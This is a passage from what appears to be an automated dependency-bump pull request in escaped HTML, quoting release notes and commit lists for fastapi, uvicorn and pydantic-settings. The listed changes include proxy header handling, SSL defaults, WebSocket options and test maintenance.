href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.135.3...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uvicorn` from 0.44.0 to 0.49.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/releases\"\u003euvicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.49.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump httptools minimum version to 0.8.0 by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2962\"\u003eKludex/uvicorn#2962\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eConsume duplicate forwarding headers in ProxyHeadersMiddleware (reverses the 0.48.0 behavior of ignoring them) by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2971\"\u003eKludex/uvicorn#2971\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.48.0...0.49.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.48.0...0.49.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.48.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2940\"\u003eKludex/uvicorn#2940\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2944\"\u003eKludex/uvicorn#2944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.47.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2919\"\u003eKludex/uvicorn#2919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2920\"\u003eKludex/uvicorn#2920\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers by \u003ca href=\"https://github.com/eltoder\"\u003e\u003ccode\u003e@​eltoder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2927\"\u003eKludex/uvicorn#2927\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2915\"\u003eKludex/uvicorn#2915\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2916\"\u003eKludex/uvicorn#2916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in websockets-sansio by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2917\"\u003eKludex/uvicorn#2917\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.45.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve forwarded client ports in proxy headers middleware by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2903\"\u003eKludex/uvicorn#2903\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003eos.PathLike\u003c/code\u003e for \u003ccode\u003elog_config\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2905\"\u003eKludex/uvicorn#2905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003elog_level\u003c/code\u003e strings case-insensitively by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2907\"\u003eKludex/uvicorn#2907\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRaise helpful \u003ccode\u003eImportError\u003c/code\u003e when PyYAML is missing for YAML log config by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2906\"\u003eKludex/uvicorn#2906\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert empty context for ASGI runs by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2911\"\u003eKludex/uvicorn#2911\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--reset-contextvars\u003c/code\u003e flag to isolate ASGI request context by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2912\"\u003eKludex/uvicorn#2912\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Emit \u003ccode\u003ehttp.disconnect\u003c/code\u003e on server shutdown for streaming responses\u0026quot; (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2829\"\u003e#2829\u003c/a\u003e) by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2913\"\u003eKludex/uvicorn#2913\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Krishnachaitanyakc\"\u003e\u003ccode\u003e@​Krishnachaitanyakc\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2870\"\u003eKludex/uvicorn#2870\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.44.0...0.45.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.44.0...0.45.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/blob/main/docs/release-notes.md\"\u003euvicorn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.49.0 (June 3, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump \u003ccode\u003ehttptools\u003c/code\u003e minimum version to 0.8.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2962\"\u003e#2962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConsume duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (reverses the 0.48.0 behavior of ignoring them) (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2971\"\u003e#2971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.48.0 (May 24, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2940\"\u003e#2940\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2944\"\u003e#2944\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.47.0 (May 14, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2920\"\u003e#2920\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2919\"\u003e#2919\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2927\"\u003e#2927\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.0 (April 23, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2915\"\u003e#2915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in \u003ccode\u003ewebsockets-sansio\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2917\"\u003e#2917\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.45.0 (April 21, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--reset-contextvars\u003c/code\u003e flag to isolate ASGI request context (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2912\"\u003e#2912\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003eos.PathLike\u003c/code\u003e for \u003ccode\u003elog_config\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2905\"\u003e#2905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003elog_level\u003c/code\u003e strings case-insensitively (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2907\"\u003e#2907\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/3ef2e3e08e3d9ad9572800f8bc54f3eaed9eab0a\"\u003e\u003ccode\u003e3ef2e3e\u003c/code\u003e\u003c/a\u003e Version 0.49.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2973\"\u003e#2973\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/eeb64b1d1c95a14096ed3313377c74b485f558fc\"\u003e\u003ccode\u003eeeb64b1\u003c/code\u003e\u003c/a\u003e Consume duplicate forwarding headers in ProxyHeadersMiddleware (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2971\"\u003e#2971\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/630f4aca14e79183617c71be714030842a1041c5\"\u003e\u003ccode\u003e630f4ac\u003c/code\u003e\u003c/a\u003e Make the watchfiles reload tests deterministic (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2972\"\u003e#2972\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/9154922e3730f7aba68ecc3ecbf536680ee8fd1c\"\u003e\u003ccode\u003e9154922\u003c/code\u003e\u003c/a\u003e chore(deps): bump the github-actions group across 1 directory with 6 updates ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/739727a1d80e468d1e47e98bbd824ee9e3c9554b\"\u003e\u003ccode\u003e739727a\u003c/code\u003e\u003c/a\u003e Migrate docs deploy from Cloudflare Pages to Workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2967\"\u003e#2967\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/be4a240488d3fb678a11b8e8f83505266f5f1de7\"\u003e\u003ccode\u003ebe4a240\u003c/code\u003e\u003c/a\u003e Gate docs preview deploy on Cloudflare token presence (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2966\"\u003e#2966\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/c489d7e10dfe653a2bba914feedf2a632a026e6f\"\u003e\u003ccode\u003ec489d7e\u003c/code\u003e\u003c/a\u003e Bump httptools minimum version to 0.8.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2962\"\u003e#2962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/9f547bd82ef52bcba206e04170b359bd6daa25b3\"\u003e\u003ccode\u003e9f547bd\u003c/code\u003e\u003c/a\u003e Skip docs preview deploy for Dependabot PRs (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2961\"\u003e#2961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/44446b894e37ca76830d6aa83df4349795400ed4\"\u003e\u003ccode\u003e44446b8\u003c/code\u003e\u003c/a\u003e Migrate documentation from MkDocs Material to Zensical (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2959\"\u003e#2959\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/cfd659c4f18b526adce9c255c96707bab20af40c\"\u003e\u003ccode\u003ecfd659c\u003c/code\u003e\u003c/a\u003e Bump pymdown-extensions to 10.21.3 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2958\"\u003e#2958\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.44.0...0.49.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic-settings` from 2.13.1 to 2.14.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic-settings/releases\"\u003epydantic-settings's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.14.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump the python-packages group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/850\"\u003epydantic/pydantic-settings#850\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 5 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/854\"\u003epydantic/pydantic-settings#854\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the github-actions group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/853\"\u003epydantic/pydantic-settings#853\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/856\"\u003epydantic/pydantic-settings#856\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix field named \u003ccode\u003ecls\u003c/code\u003e conflicting with classmethod parameter by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/858\"\u003epydantic/pydantic-settings#858\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare release 2.14.1 by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/859\"\u003epydantic/pydantic-settings#859\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\"\u003ehttps://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.14.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix parsing env vars into Optional Strict types by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/792\"\u003epydantic/pydantic-settings#792\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix RecursionError with mutually recursive models in CLI by \u003ca 